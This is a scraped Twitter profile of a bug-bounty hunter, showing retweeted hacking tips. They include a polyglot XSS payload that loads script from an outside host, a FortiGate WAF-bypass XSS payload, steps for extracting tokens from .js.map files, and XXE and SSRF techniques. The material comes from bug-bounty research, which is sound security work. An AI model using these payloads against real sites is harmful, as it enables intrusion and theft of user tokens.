Nikhil Singh Rajput (@swaggy_singh_r) 's Twitter Profile
Nikhil Singh Rajput

@swaggy_singh_r

Bug Hunter 🎩 || Student of IT || To BE A Hacker 🇮🇳

ID: 1434725041279623170

calendar_today06-09-2021 03:48:59

610 Tweet

84 Takipçi

432 Takip Edilen

Mr_mars_hacker (@mr_mars_hacker) 's Twitter Profile Photo

Cross-origin to 1500$ bounty (For more join on discord : discord.gg/Y467qAFM4X) #bugbounty #bugbountytips #bugbountytip ahackersblog.com/p/cross-origin…

Amit Kumar🇮🇳 (@amitlt2) 's Twitter Profile Photo

🔍✨ Revealing sensitive data leaks with .json! Pro tip: Adding a .json extension to your request might uncover hidden secret like accessing a secret token! #bugbounty #bugbountytips #cybersecurity #hackerone #vulnerability #Hackers #web #protip #infosecurity

🔍✨ Revealing sensitive data leaks with .json!

Pro tip: Adding a .json extension to your request might uncover hidden secret like accessing a secret token!

#bugbounty #bugbountytips #cybersecurity #hackerone #vulnerability #Hackers #web #protip #infosecurity
Amit Kumar🇮🇳 (@amitlt2) 's Twitter Profile Photo

🚨 Ultimate #XSS Payload for Every Scenario! 🚨 JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/* <!--</Title/</Style/</Script/</textArea/</iFrame> \74k<K/contentEditable/autoFocus/OnFocus= /*${/*/;{/**/(import(/https:\\X55.is/.source))}//\76--> By Rodolfo Assis

jp / kw0 (@joshuaprovoste) 's Twitter Profile Photo

This report was completely unexpected for me! 😇 1. Bypass the login.microsoftonline.com gateway 2. Inspect *.js files and append *.js.map extension 4. Dump *.js.map files to find secrets or endpoints 5. Abuse the token in API request #bugbounty #bugbountytips #bugbountytip

This report was completely unexpected for me! 😇

1. Bypass the login.microsoftonline.com gateway
2. Inspect *.js files and append *.js.map extension
4. Dump *.js.map files to find secrets or endpoints
5. Abuse the token in API request

#bugbounty #bugbountytips #bugbountytip
Mr_mars_hacker (@mr_mars_hacker) 's Twitter Profile Photo

SSRF to internal port scan on a self hosted program (For more join on discord : discord.gg/Y467qAFM4X) #bugbounty #bugbountytips #bugbountytip medium.com/@jeetpal2007/s…

Mr_mars_hacker (@mr_mars_hacker) 's Twitter Profile Photo

Self XSS into BXSS(For more join on discord : discord.gg/Y467qAFM4X) #bugbounty #bugbountytips #bugbountytip medium.com/@mohameddaher/…

chux (@chux13786509) 's Twitter Profile Photo

Another buggg 🔥 XXE by a docx file upload and rendering! Take office files (docx, xlsx, pptx) and change the extension to .zip, you'll see many XML files inside. Try to add your XXE payload if the document should be processed by the server 🪲 #bugbountytips #BugBounty #Hacking

Another buggg 🔥
XXE by a docx file upload and rendering!
Take office files (docx, xlsx, pptx) and change the extension to .zip, you'll see many XML files inside.
Try to add your XXE payload if the document should be processed by the server 🪲
#bugbountytips #BugBounty #Hacking
bbupdate (@inbbupdates) 's Twitter Profile Photo

Account takeover vulnerability that resulted in $2500 bounty! medium.com/@deadoverflow/… #infosec #bugbounty #TogetherWeHitHarder #inbbupdatesblogs

xss0r (@xss0r) 's Twitter Profile Photo

#Fortinet_Fortigate_XSS_Bypass by xss0r #Payload: <dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a()%20x> #xss0r #xss #xsspayloads #bypassWAFxss #ibrahimxss

#Fortinet_Fortigate_XSS_Bypass by xss0r
#Payload:  &lt;dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a()%20x&gt;

#xss0r #xss #xsspayloads #bypassWAFxss #ibrahimxss
Nikhil Singh Rajput (@swaggy_singh_r) 's Twitter Profile Photo

I am in train number 12915 and this is my PNR NUMBER 8234798290 Train: Sabarmati BG to Delhi And this is the situation of train Even if want to go to toilet i can't go

I am in train number 12915 and this is my PNR NUMBER 8234798290
Train: Sabarmati BG  to Delhi 
And this is the situation of train Even if want to go to toilet i can't go